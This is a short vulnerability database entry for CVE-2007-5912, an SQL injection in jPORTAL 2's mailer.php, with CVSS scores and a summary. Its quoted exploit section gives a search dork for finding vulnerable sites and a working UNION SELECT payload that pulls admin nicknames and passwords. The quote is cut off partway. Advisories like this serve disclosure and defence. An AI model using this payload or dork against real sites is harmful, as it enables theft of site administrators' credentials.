7.5
CVSSv2

CVE-2007-5912

Published: 10/11/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in mailer.php in jPORTAL 2 allows remote malicious users to execute arbitrary SQL commands via the to parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

jportal jportal web portal 2

Exploits

Tytul: jPORTAL 2 Remote SQL Injection Vulnerability dork:[ intext:"jPORTAL 2" & inurl:"mailerphp" ] Autor: Kacper E-Mail: kacper1964@yahoopl Strona: devilteameu Irc: ircmyg0tcom #devilteam Blad: mailerphp?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/* po wykonaniu zapytania wystarczy zajr ...